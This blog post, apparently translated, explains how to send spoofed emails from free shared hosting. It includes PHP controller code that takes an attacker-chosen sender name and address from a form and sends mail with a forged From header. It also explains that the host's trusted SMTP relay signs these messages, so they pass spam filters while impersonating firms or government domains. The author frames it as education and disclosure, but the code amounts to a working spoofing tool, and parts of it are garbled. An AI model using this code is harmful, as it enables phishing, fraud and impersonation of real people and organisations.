Using free hosting for Spoofing and forging Emails for Spamming

Email Spoofing, as its name suggests, is a method used by malicious attackers to falsify the sender of an e-mail message through a DNS zone or SMTP authentication failure.

There are many vectors that can be applied to the use of Email Spoofing . A malicious person can use this device to send billing messages to the bank’s email, send messages to their relatives, and even take advantage of business opportunities by forging e-mails from directories, supervisors, and employees in general in order to take advantage Or harming people.

Today, the goal of this article is free host and hosting servers, which, through openness to the public and ease of access to sendmail, SMTP, and zone transfers, make room for malicious attackers who may be hosting applications Who take advantage of the lack of server SMTP authentication to change the scope of the emai, thus taking advantage of the signing of their certificate to pass SPAM filters and fraud control.

But how does this work in practice?

1. An attacker using a space allocated on a shared hosting server for free hosting hosts a malicious thesis application that uses PHP’s mail function or Python’s SMTPlib or any other library or specific function for mounting and sending emails By SMTP protocol. This application is intended to receive input posts and based on a controller, to mount this data in an object with email scope. I wrote this PoC in PHP because most of the free hosting servers (which I tested) only have support for PHP, MySQL and etc, and I felt more inclined to build the objects with CodeIgniter . Let’s look at the function below:

defined(BASEPATH) or exit(No direct script access allowed);
class Envia extends CI_Controller {
function __construct() {
public function enviar() {
if ($_POST) {
$fromname = $this->input->post(fromname);
$fromemail = $this->input->post(fromemail);
$toemail = $this->input->post(toemail);
$subject = $this->input->post(subject);
$message = $this->input->post(message);
$data = array(fromname => $fromname, fromemail => $fromemail, toemail => $toemail, subject => $subject, message => $message);
if ($this->send_spoofing($data) == TRUE) {
return TRUE;
} else {
return FALSE
view raw sendspoof.php hosted with ❤ by GitHub

We built a class to send the e-mails. This process is a normal process for building email scopes on any occasion. We get some posts sent to the controller and put it into an array. This part is really very basic, we will use this function simply to put the data in the Array and call another function called ‘ send_spoofing () ‘ passing this data as argument. This function is responsible for the delivery itself.

<? php public function send_spoofing($data) { #Constroi e manda o e-mail $fromemail = $data[fromemail]; $fromname = $data[fromname]; $to = $data[toemail]; $subject = $data[subject]; $message = $data[message]; $utf = Content-Type: text/plain;charset=UTF-8\n; $lt = <; $gt = >; $sp = ; $from = From:; $headers = $utf . $from . $fromname . $sp . $lt . $fromemail . $gt; if (mail($to, $subject, $message, $headers)) { return TRUE; } else { return FALSE; }

view raw sendspoof2.php hosted with ❤ by GitHub

As we can see, we have created a function responsible for building an email scope with the data we receive from the array. Let us also set the ‘utf-8’ standard simply for the sake of leaving everything cute and avoid making fun of special characters when the victim receives the message with a different encode from your email client with ‘$ utf =’ Content-Type: Text / plain; charset = UTF-8 \ n “; ‘ And then we construct the header of the email with the data that we received.

 $headers = $utf . $from . $fromname . $sp . $lt . $fromemail . $gt;

It is extremely important to pay attention to this detail, because if something escapes the standard of the example that follows the MIMEText 1.0 standard, the email will not be sent or will be sent with its unconfigured attributes, being able to take the Subject of the message in its body and vice And versa. For those who have never seen, the default MIMEText after built, mounts the data as follows the example below.

 Content-Type: multipart/mixed; boundary="===============5711234466013666245==" MIME-Version: 1.0 From: To: Subject: Assunto da Mensagem --===============5711234466013666245== Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: base64 Q29ycG8gZGEgbWVuc2FnZW0= --===============5711234466013666245==--

2. So far we have seen two very quiet functions that do not escape anything surreal. You can use this example to send emails normally in your provider, there is nothing very specific. That is the problem: As we have seen in the diagram above. This exploitation consists of taking advantage of the ‘public key’ that the hosting server has with the SMTP server , or the lack of authentication between them depending on the occasion, and without requiring those credentials, send directly to the same process with the scope Created in advance, using a fake From: ‘hard face, accepting any server we put there, such as @microsoft, @apple, @gov, @ * and so on. In case, what will be sent in the future is an email authenticated by the certificate of authority of the server, and the same will be signed by him, and not by the recipient email that we send, that is where Spoofing will work.

3. After building this email, it is sent and signed by the trusted SMTP server within the hosting cluster, and forwarded to the victim through the same. For example, I created a malicious application on a free Host server that will not be able to reveal the identity until the company in question responds to my emails authorizing , but in any case follows the example made between emails created only for that Example, without prejudice to third parties or involve any other corporation and harm individuals or legal entities.

Opening the certificate of the message to analyze better, we can identify the exact origin of the email, including subscription, IP, hostname and served, and can even prevent and send the signature for our spam mail. However, since it is not a common practice for users to open SMTP certificates, we can conclude that if this technique is applied, it can be used to perform social engineering attacks, identity theft, and so on. Remembering that we are not responsible for the improper use of the material presented here. All content was written to create educational content for information security professionals and students . In total, 3 companies have been found to have this ‘facility’ open, two of them are free and one is not. One company has been notified and will not have its identity exposed for the time being. The others will be contacted in the next few days.